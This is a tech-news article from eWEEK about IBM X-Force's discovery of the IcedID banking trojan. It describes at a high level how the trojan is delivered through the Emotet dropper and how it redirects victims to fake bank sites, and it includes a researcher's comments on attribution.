IceID Banking Trojan Redirects Users to Fake Sites, IBM Reports


A new banking trojan has been discovered by IBM researchers, that is built with custom code, though it uses similar tactics to existing malware attacks.

Banking Trojan 2

There is a new banking trojan taking aim at global financial institutions, that is being dubbed “IceID” by the IBM X-Force research team that first discovered the malware.

The IceID trojan relies on an existing known malware dropper known as Emotet, to initially exploit a victim’s system. IceID then provides the trojan payload, redirecting victims to an attacker site that is designed as a replica of a real banking website.  The IceID trojan attack has targeted banks, payment card providers and ecommerce sites in the US, Canada and the UK.

“IBM X-Force monitors close to 300 million protected endpoints across the globe, detecting and mapping threat evolution close to real-time,” Limor Kessem, Executive Security Advisor, IBM Security, told eWEEK. “X-Force research detected and analyzed IcedID as soon as it was identified in attempts to infect end users.”

It’s not entirely clear how many victims IceID has claimed or how widespread the distribution of the  trojan has been to date. Kessem noted that X-Force detected IcedID very early after its launch and so far, the campaigns are still small, with the number of infections being limited. Kessem added that by using the Emotet dropper as a distribution mechanism, IceID’s authors have also attempted to keep the malware under the radar. She explained that Emotet itself is usually delivered via malware spam (malspam), often concealed in productivity file attachments.

“After the user is first infected with Emotet, the latter is used as a covert tunnel through which other malware is delivered and executed on the endpoint,” Kessem said. “Aside from newly dropping IcedID, Emotet is known for its connection with a variety of malicious codes, most recently the QakBot banking Trojan that targets business banking in North America.”


Among the core capabilities that IceID has is that it redirects victims to an attacker controlled site. Kessem explained that instead of using web-injections on the bank’s site, IcedID takes the victim to a page it serves from its own server, and can communicate with the victim there, away from the bank’s control. Kessem added that the redirection pages are often very hard for regular users to identify.

“Redirection attacks are malware-facilitated operations in which the bank’s genuine site is an unwilling participant,” Kessem said. “The malware keeps a live connection to the genuine site and manipulates the fake session in a way that has it present the bank’s true URL  in the address bar.”

IceID does not actually directly exploit user systems, as it is delivered into an already compromised endpoint that was first exploited by the Emotet dropper.

“To gain the initial foothold, Emotet uses malicious Javascript in file macros in order to invoke a PowerShell script to fetch the payload from a remote server,” Kessem said. “This process is initiated by unwitting users who are tricked into opening email attachments that carry concealed malcode.”

Though IceID uses tactics that have been seen in other banking trojans before, according to IBM X-Force’s analysis, IcedID is custom code. From an attribution perspective, it’s not entirely clear where IceID comes from or who wrote the code. Kessem warned that when it comes to cyber-crime activity, attribution is often a tricky concept as malware can be operated by different groups, sub-groups, or be sold and shared. That said, IBM X-Force researchers do have some suspicions.

“According to an analysis of IcedID’s infrastructure, the malware’s main servers are hosted in Russia,” Kessem said. “Judging by the company it keeps, IcedID is delivered by the same group that delivers QakBot and Dridex, both of which are also known to come from Russian-speaking regions.”

Sean Michael Kerner is a senior editor at eWEEK and Follow him on Twitter @TechJournalist.


Leave A Reply